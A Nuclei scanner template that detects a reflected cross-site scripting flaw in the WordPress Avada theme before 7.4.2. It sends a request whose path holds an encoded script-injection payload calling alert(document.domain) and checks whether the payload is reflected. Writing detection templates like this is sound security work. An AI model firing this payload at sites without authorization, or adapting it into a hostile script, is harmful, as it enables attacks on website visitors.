nuclei-templates/http/vulnerabilities/other/avada-xss.yaml

41 lines
1.2 KiB
YAML
Raw Normal View History

2022-04-22 08:56:53 +00:00
id: avada-xss
info:
name: WordPress Avada Website Builder <7.4.2 - Cross-Site Scripting
2022-04-22 08:56:53 +00:00
author: Akincibor
severity: high
description: WordPress Avada Website Builder prior to 7.4.2 contains a cross-site scripting vulnerability. The theme does not properly escape bbPress searches before outputting them back as breadcrumbs.
2022-04-22 08:56:53 +00:00
reference:
- https://wpscan.com/vulnerability/eb172b07-56ab-41ce-92a1-be38bab567cb
- https://theme-fusion.com/documentation/avada/installation-maintenance/avada-changelog/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: xss,wp,wordpress,wp-theme,avada,wpscan
metadata:
max-request: 1
2022-04-22 08:56:53 +00:00
http:
2022-04-22 08:56:53 +00:00
- method: GET
path:
2022-04-28 17:57:46 +00:00
- '{{BaseURL}}/forums/search/z-->%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/'
2022-04-22 08:56:53 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-04-28 17:57:46 +00:00
- '"></script><script>alert(document.domain)</script>'
- 'avada-footer-scripts'
2022-04-28 14:41:50 +00:00
condition: and
2022-04-22 08:56:53 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200